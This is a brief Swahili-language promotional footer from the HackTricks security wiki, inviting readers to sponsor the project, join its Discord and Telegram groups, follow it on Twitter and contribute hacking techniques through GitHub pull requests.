Support HackTricks * Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! * **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}